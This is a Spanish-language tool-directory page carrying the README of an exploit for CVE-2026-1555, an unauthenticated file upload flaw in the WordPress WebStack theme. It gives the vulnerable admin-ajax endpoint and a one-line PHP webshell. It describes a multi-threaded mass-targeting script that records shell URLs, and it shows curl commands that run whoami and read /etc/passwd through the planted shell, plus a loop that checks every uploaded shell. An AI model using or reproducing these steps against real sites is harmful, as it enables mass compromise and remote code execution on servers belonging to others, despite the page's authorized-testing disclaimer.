Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-1555 — WebStack <= 1.2024 - Subida de archivos arbitrarios sin autenticación | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2026-1555
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubnxploited/cve-2026-1555

CVE-2026-1555

WebStack <= 1.2024 - Subida de archivos arbitrarios sin autenticación

Ver Repositorio
91hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-1555

WebStack <= 1.2024 - Subida de Archivos Arbitraria No Autenticada

👤 Por: Nxploited

🔗 Nxploited ZeroDay Hub — t.me/KNxploited


💀 CVE-2026-1555 — Subida de Archivos Arbitraria en WordPress WebStack

Ejecución Remota de Código no Autenticada a través del manejador AJAX img_upload

Python CVE CVSS Auth


📌 Resumen de la Vulnerabilidad

🔬 Causa Raíz Técnica

La función io_img_upload() registrada bajo el hook de acción img_upload de admin-ajax.php de WordPress no realiza ninguna validación de tipo de archivo o extensión antes de escribir el archivo subido en el servidor. Debido a que la acción se registra sin comprobaciones de autenticación (wp_ajax_nopriv_), cualquier atacante remoto no autenticado puede enviar por POST un archivo arbitrario — incluyendo un webshell PHP — y el servidor lo almacenará en una ruta de acceso público, lo que permite la Ejecución Remota de Código directa.

Endpoint vulnerable:

root@kitploit:~
POST /wp-admin/admin-ajax.php
action=img_upload
files=@<payload>

⚙️ Características de la Herramienta

  • 🔁 Escaneo multi-hilo con número de workers configurable
  • 📋 Soporte de objetivos masivos mediante un archivo de lista de objetivos
  • 📤 Extracción automática de la URL de la shell desde la respuesta JSON
  • 💾 Las URLs de shell exitosas se guardan en uploaded_paths.txt
  • 🎨 Interfaz de terminal enriquecida con seguimiento de progreso en vivo
  • 🔕 Verificación SSL suprimida para máxima compatibilidad

📦 Requisitos

Versión de Python: 3.8+

Instala las dependencias:

root@kitploit:~
pip install requests rich urllib3

🚀 Uso

1. Prepara tu lista de objetivos

Crea un archivo llamado list.txt (o cualquier nombre que prefieras) con un objetivo por línea:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com

A los objetivos sin http:// o https:// se les añade automáticamente el prefijo http://.

2. Prepara tu payload

Coloca tu webshell en el mismo directorio que el script. Ejemplo:

root@kitploit:~
# Minimal PHP webshell
echo '<?php system($_GET["cmd"]); ?>' > shell.php

3. Ejecuta la herramienta

root@kitploit:~
python CVE-2026-1555.py

Se te pedirá:


📤 Salida y Extracción de la Shell

Salida en Vivo

Cada subida exitosa imprime:

root@kitploit:~
╭─ IMG_UPLOAD ──────────────────────────────────╮
│ Upload successful                              │
│                                                │
│ Target:    https://target.com                  │
│ Shell URL: https://target.com/wp-content/...   │
╰────────────────────────────────────────────────╯

Resultados Guardados

Todas las URLs de shell exitosas se añaden a:

root@kitploit:~
uploaded_paths.txt

Accediendo a tu Shell

Después de una subida exitosa, accede a la shell directamente mediante el navegador o curl:

root@kitploit:~
# Browser
https://target.com/wp-content/uploads/shell.php?cmd=id

# curl
curl "https://target.com/wp-content/uploads/shell.php?cmd=whoami"

# Full command execution
curl "https://target.com/wp-content/uploads/shell.php?cmd=cat+/etc/passwd"

La ruta exacta de subida se extrae de la respuesta JSON del servidor (data.src) y se imprime automáticamente.

Verificación Masiva de Shells

Verifica rápidamente todas las shells subidas desde el archivo de salida:

root@kitploit:~
while read url; do
  echo -n "[*] $url -> "
  curl -sk "$url?cmd=id" 2>/dev/null || echo "DEAD"
done < uploaded_paths.txt

📊 Resumen de Salida

Al final de cada ejecución, se imprime un resumen:

root@kitploit:~
Summary  50/50  OK: 12  FAIL: 38
╭──────────────────────────────────────────╮
│  Shell URLs saved to uploaded_paths.txt  │
╰──────────────────────────────────────────╯

🗂️ Estructura de Archivos

root@kitploit:~
CVE-2026-1555.py       ← Main exploit script
list.txt               ← Target URLs (one per line)
shell.php              ← Payload to upload
uploaded_paths.txt     ← Auto-generated: successful shell URLs

⚠️ Descargo de Responsabilidad

Esta herramienta se proporciona estrictamente para pruebas de penetración autorizadas, investigación de seguridad y fines educativos únicamente.

El autor — Nxploited — no se hace responsable de ningún uso indebido, daño o actividad ilegal realizada con esta herramienta. Al usar esta herramienta, confirmas que tienes permiso escrito explícito para probar todos los sistemas objetivo.

El uso no autorizado contra sistemas que no posees o para los que no tienes permiso explícito de pruebas es ilegal y puede dar lugar a un proceso penal conforme a las leyes de ciberdelincuencia aplicables.

Úsala de forma responsable. Eres el único responsable de tus acciones.


👤 Autor: Nxploited 📣 Canal: Nxploited ZeroDay Hub 💬 Telegram: @KNxploited

Descargar herramienta
CampoDetalle
ID CVECVE-2026-1555
Componente AfectadoTema WebStack para WordPress
Versiones VulnerablesTodas las versiones hasta 1.2024 inclusive
Tipo de VulnerabilidadSubida de Archivos Arbitraria → Ejecución Remota de Código
Autenticación Requerida❌ Ninguna (No autenticada)
Puntuación CVSS9.8 CRÍTICA
Vector CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
SolicitudDescripciónPor Defecto
Targets fileRuta a tu lista de objetivoslist.txt
ThreadsNúmero de workers concurrentes6
Local file to uploadNombre del archivo de tu payload (en el directorio del script)shell.php